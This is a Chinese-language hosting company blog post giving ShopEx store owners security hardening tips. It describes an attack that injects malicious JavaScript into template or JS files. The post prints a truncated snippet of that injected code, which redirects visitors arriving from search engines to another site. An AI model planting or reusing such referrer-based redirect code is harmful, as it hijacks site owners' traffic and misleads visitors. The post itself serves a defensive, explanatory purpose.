Shopex是一個非常成熟、優(yōu)秀的網(wǎng)店銷售平臺。由于他是一個免費的php開源系統(tǒng)，從而使用的人自然而然的就會多起來，用的人多了，研究的人也會就隨之多起來，時不時的有一些安全漏洞也是在所難免的！數(shù)據(jù)無價，資源無價，假若一個商城被攻擊，或被掛馬等操作后果就不堪設想，我想各位站長、開店的老板們也不想看著自己因為安全措施不到位而出現(xiàn)損失現(xiàn)象吧！那么就跟隨無憂主機小編強化Shopex安全設置吧！ 無憂主機在很久以前也有一篇“Shopex安全設置 ”文章，在此就不重述了，只為安全設置做更完善的補充，列出一下幾點： 1.定期做好網(wǎng)站備份，什么都不要說，備份好了數(shù)據(jù)就不會丟失，這是硬道理！小編一直強調(diào)。 2.刪除安裝文件install；程序安裝好了就不需要安裝第二次了，需要的話，再重新上傳到空間上面，不需要的話很容易被利用，因為里面有涉及到檢測系統(tǒng)環(huán)境的文件。 3.隱藏程序版權，避免開源程序暴露；這種版權修改的越徹底越好，如果別人不知道你的網(wǎng)站程序是什么，就不知道怎么黑你了，不知道怎么黑你，是不是就躲過一劫了呢？補充知識“SHOPEX去除底部版權信息“POWERED BY SHOPEX V4.8.5 ””、“ SHOPEX如何修改底部版權信息”。 4.程序環(huán)境安全配置；關閉錯誤頁面信息顯示display_errors=Off，可以防止某些程序在報錯的時候無意中泄露網(wǎng)站物理路徑，避免被黑客利用；在ShopEx的config.php文件中配置ini_set("display_errors","Off"); 5.網(wǎng)站日常維護時偶爾掃描下木馬，檢查是否有文件被修改，如果覺得網(wǎng)站不對勁，或者是發(fā)現(xiàn)了一些可疑文件，盡快確認是否安全，及早發(fā)現(xiàn)，防范于未然。 6.還有就是關注官網(wǎng)，官方論壇，了解Shopex最新動態(tài)，遇到問題及時處理！ 最近有一個Shopex被黑客惡意植入代碼的行為讓你被收錄的網(wǎng)站獲取不到搜索引擎上的流量，就是別人在百度，谷歌上面搜索到你的網(wǎng)站想點擊進去訪問時，會直接跳到別人的網(wǎng)站上面；當你找到這段JS文件你就會發(fā)現(xiàn)，這段JS就是劫持了所有搜索引擎的路徑： Var regexp=/.(sogou|soso|baidu|google|youdao|yahoo|bing|360|so|gougou|ifeng|ivc|sooule|niuhu|biso)(.[a-z0-9-]+){1,2}\//ig; var where =document.referrer; if(regexp.test(where)) { document.write('<a target="_self" id="go" );go.click(); } 惡意代碼一般是被加在了您網(wǎng)站的公共js文件或是頭尾模板文件里面，請大家注意排查。 小編在這里提醒各位，遇到以上問題請不要慌張，聯(lián)系我們無憂主機客服都可以解決這些問題！ 無憂主機相關文章推薦閱讀： 解決SHOPEX網(wǎng)站白屏方法總結 2014年最新SHOPEX網(wǎng)站搬家教程 SHOPEX搬家運行的時候出錯問題補充？ SHOPEX不小心把管理員降級了怎么辦？

本文地址：http://www.gle-technology.com/shopex/16533.html